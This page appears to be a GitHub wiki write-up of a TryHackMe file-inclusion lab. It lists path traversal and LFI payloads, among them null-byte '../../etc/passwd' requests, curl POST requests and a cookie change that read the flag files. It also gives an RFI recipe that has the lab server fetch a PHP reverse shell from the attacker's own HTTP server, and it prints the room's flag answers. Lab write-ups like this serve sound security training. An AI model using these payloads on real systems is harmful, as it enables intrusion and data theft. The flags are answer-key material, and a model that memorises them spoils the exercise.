THM File Inclusion - grunt92/IT-Sec-WriteUps GitHub Wiki

Introduction

Let's continue to the next section to deploy the attached VM.

No answer needed

Deploy the VM

Once you've deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!

No answer needed

Path Traversal

What function causes path traversal vulnerabilities in PHP?

File_Get_Contents

Local File Inclusion - LFI

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

includes

Local File Inclusion - LFI #2

Give Lab #3 a try to read /etc/passwd. What is the request look like?

/lab3.php?file=../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

file_get_contents

Try out Lab #6 and check what is the directory that has to be in the input field?

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

In Lab #6 enter "THM-profile/../../../../etc/os-release" to get the answer.

12.04

Remote File Inclusion - RFI

We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.

Remediation

Ready for the challenges?

No answer needed

Challenge

Capture Flag1 at /etc/flag1

Run curl -d "file=/etc/flag1" -X POST http://IP/challenges/chall1.php

F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

Inspect the site and you see that there is a cookie identifying us as user using the THM-cookie. Change the value to "../../../../etc/flag2%00". And reload the site.

c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

Run curl -d "file=../../../etc/flag3%00" -X POST http://IP/challenges/chall3.php --output file.txt and cat file.txt to get the flag.

P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Select a php-reverse-shell of your choice and edit the shell to connect to your device. Place the shell in a directory and start a http-server using python3 http.server 9999 in the playground. Start a listener on your device and go to "http://THM_IP/playground.php?file=http://LOCAL_DEVICE:PORT/php-reverse-shell.php". A shell should be established. Run hostname to get the answer.

lfi-vm-thm-f8c5b1a78692